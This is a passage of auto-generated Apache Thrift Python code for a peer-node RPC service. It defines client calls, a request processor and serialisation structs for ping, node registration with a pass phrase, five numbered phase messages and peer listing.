args = phase_3_message_args()
args.p3 = p3
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_phase_3_message(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = phase_3_message_result()
result.read(iprot)
iprot.readMessageEnd()
return
def phase_4_message(self, p4):
"""
Parameters:
- p4
"""
self.send_phase_4_message(p4)
self.recv_phase_4_message()
def send_phase_4_message(self, p4):
self._oprot.writeMessageBegin('phase_4_message', TMessageType.CALL, self._seqid)
args = phase_4_message_args()
args.p4 = p4
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_phase_4_message(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = phase_4_message_result()
result.read(iprot)
iprot.readMessageEnd()
return
def phase_5_message(self, p5):
"""
Parameters:
- p5
"""
self.send_phase_5_message(p5)
self.recv_phase_5_message()
def send_phase_5_message(self, p5):
self._oprot.writeMessageBegin('phase_5_message', TMessageType.CALL, self._seqid)
args = phase_5_message_args()
args.p5 = p5
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_phase_5_message(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = phase_5_message_result()
result.read(iprot)
iprot.readMessageEnd()
return
def get_peers(self):
self.send_get_peers()
return self.recv_get_peers()
def send_get_peers(self):
self._oprot.writeMessageBegin('get_peers', TMessageType.CALL, self._seqid)
args = get_peers_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_peers(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = get_peers_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.unauthorized is not None:
raise result.unauthorized
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_peers failed: unknown result")
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["ping"] = Processor.process_ping
self._processMap["get_node_info"] = Processor.process_get_node_info
self._processMap["register_node"] = Processor.process_register_node
self._processMap["unregister_node"] = Processor.process_unregister_node
self._processMap["phase_1_message"] = Processor.process_phase_1_message
self._processMap["phase_2_message"] = Processor.process_phase_2_message
self._processMap["phase_3_message"] = Processor.process_phase_3_message
self._processMap["phase_4_message"] = Processor.process_phase_4_message
self._processMap["phase_5_message"] = Processor.process_phase_5_message
self._processMap["get_peers"] = Processor.process_get_peers
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_ping(self, seqid, iprot, oprot):
args = ping_args()
args.read(iprot)
iprot.readMessageEnd()
result = ping_result()
try:
self._handler.ping()
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("ping", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_node_info(self, seqid, iprot, oprot):
args = get_node_info_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_node_info_result()
try:
result.success = self._handler.get_node_info()
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except UnauthorizedException as unauthorized:
msg_type = TMessageType.REPLY
result.unauthorized = unauthorized
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("get_node_info", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_register_node(self, seqid, iprot, oprot):
args = register_node_args()
args.read(iprot)
iprot.readMessageEnd()
result = register_node_result()
try:
result.success = self._handler.register_node(args.node, args.pass_phrase)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except UnauthorizedException as unauthorized:
msg_type = TMessageType.REPLY
result.unauthorized = unauthorized
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("register_node", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_unregister_node(self, seqid, iprot, oprot):
args = unregister_node_args()
args.read(iprot)
iprot.readMessageEnd()
try:
self._handler.unregister_node(args.pass_phrase)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except:
pass
def process_phase_1_message(self, seqid, iprot, oprot):
args = phase_1_message_args()
args.read(iprot)
iprot.readMessageEnd()
result = phase_1_message_result()
try:
self._handler.phase_1_message(args.p1)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("phase_1_message", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_phase_2_message(self, seqid, iprot, oprot):
args = phase_2_message_args()
args.read(iprot)
iprot.readMessageEnd()
result = phase_2_message_result()
try:
self._handler.phase_2_message(args.p2)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("phase_2_message", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_phase_3_message(self, seqid, iprot, oprot):
args = phase_3_message_args()
args.read(iprot)
iprot.readMessageEnd()
result = phase_3_message_result()
try:
self._handler.phase_3_message(args.p3)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("phase_3_message", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_phase_4_message(self, seqid, iprot, oprot):
args = phase_4_message_args()
args.read(iprot)
iprot.readMessageEnd()
result = phase_4_message_result()
try:
self._handler.phase_4_message(args.p4)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("phase_4_message", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_phase_5_message(self, seqid, iprot, oprot):
args = phase_5_message_args()
args.read(iprot)
iprot.readMessageEnd()
result = phase_5_message_result()
try:
self._handler.phase_5_message(args.p5)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("phase_5_message", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_peers(self, seqid, iprot, oprot):
args = get_peers_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_peers_result()
try:
result.success = self._handler.get_peers()
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except UnauthorizedException as unauthorized:
msg_type = TMessageType.REPLY
result.unauthorized = unauthorized
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("get_peers", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class ping_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ping_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ping_result:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ping_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_node_info_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_node_info_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_node_info_result:
"""
Attributes:
- success
- unauthorized
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (Node, Node.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'unauthorized', (UnauthorizedException, UnauthorizedException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, unauthorized=None,):
self.success = success
self.unauthorized = unauthorized
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = Node()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.unauthorized = UnauthorizedException()
self.unauthorized.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_node_info_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.unauthorized is not None:
oprot.writeFieldBegin('unauthorized', TType.STRUCT, 1)
self.unauthorized.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.success)
value = (value * 31) ^ hash(self.unauthorized)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class register_node_args:
"""
Attributes:
- node
- pass_phrase
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'node', (Node, Node.thrift_spec), None, ), # 1
(2, TType.STRING, 'pass_phrase', None, None, ), # 2
)
def __init__(self, node=None, pass_phrase=None,):
self.node = node
self.pass_phrase = pass_phrase
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.node = Node()
self.node.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.pass_phrase = iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('register_node_args')
if self.node is not None:
oprot.writeFieldBegin('node', TType.STRUCT, 1)
self.node.write(oprot)
oprot.writeFieldEnd()
if self.pass_phrase is not None:
oprot.writeFieldBegin('pass_phrase', TType.STRING, 2)
oprot.writeString(self.pass_phrase)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.node)
value = (value * 31) ^ hash(self.pass_phrase)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class register_node_result:
"""
Attributes:
- success
- unauthorized
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'unauthorized', (UnauthorizedException, UnauthorizedException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, unauthorized=None,):
self.success = success
self.unauthorized = unauthorized
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.unauthorized = UnauthorizedException()
self.unauthorized.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('register_node_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.unauthorized is not None:
oprot.writeFieldBegin('unauthorized', TType.STRUCT, 1)
self.unauthorized.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.success)
value = (value * 31) ^ hash(self.unauthorized)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class unregister_node_args:
"""
Attributes:
- pass_phrase
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'pass_phrase', None, None, ), # 1
)
def __init__(self, pass_phrase=None,):
self.pass_phrase = pass_phrase
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.pass_phrase = iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('unregister_node_args')
if self.pass_phrase is not None:
oprot.writeFieldBegin('pass_phrase', TType.STRING, 1)
oprot.writeString(self.pass_phrase)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.pass_phrase)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class phase_1_message_args:
"""
Attributes:
- p1
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'p1', (Phase_1_msg, Phase_1_msg.thrift_spec), None, ), # 1
)
def __init__(self, p1=None,):
self.p1 = p1
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.p1 = Phase_1_msg()
self.p1.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('phase_1_message_args')
if self.p1 is not None:
oprot.writeFieldBegin('p1', TType.STRUCT, 1)
self.p1.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.p1)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class phase_1_message_result:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('phase_1_message_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class phase_2_message_args:
"""
Attributes:
- p2
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'p2', (Phase_2_msg, Phase_2_msg.thrift_spec), None, ), # 1
)
def __init__(self, p2=None,):
self.p2 = p2
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.p2 = Phase_2_msg()
self.p2.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('phase_2_message_args')
if self.p2 is not None:
oprot.writeFieldBegin('p2', TType.STRUCT, 1)
self.p2.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.p2)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class phase_2_message_result:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('phase_2_message_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class phase_3_message_args:
"""
Attributes:
- p3
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'p3', (Phase_3_msg, Phase_3_msg.thrift_spec), None, ), # 1
)
def __init__(self, p3=None,):
self.p3 = p3
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.p3 = Phase_3_msg()
self.p3.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('phase_3_message_args')
if self.p3 is not None:
oprot.writeFieldBegin('p3', TType.STRUCT, 1)
self.p3.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.p3)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class phase_3_message_result:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('phase_3_message_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class phase_4_message_args:
"""
Attributes:
- p4
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'p4', (Phase_4_msg, Phase_4_msg.thrift_spec), None, ), # 1
)
def __init__(self, p4=None,):
self.p4 = p4
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.p4 = Phase_4_msg()
self.p4.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('phase_4_message_args')
if self.p4 is not None:
oprot.writeFieldBegin('p4', TType.STRUCT, 1)
self.p4.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.p4)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
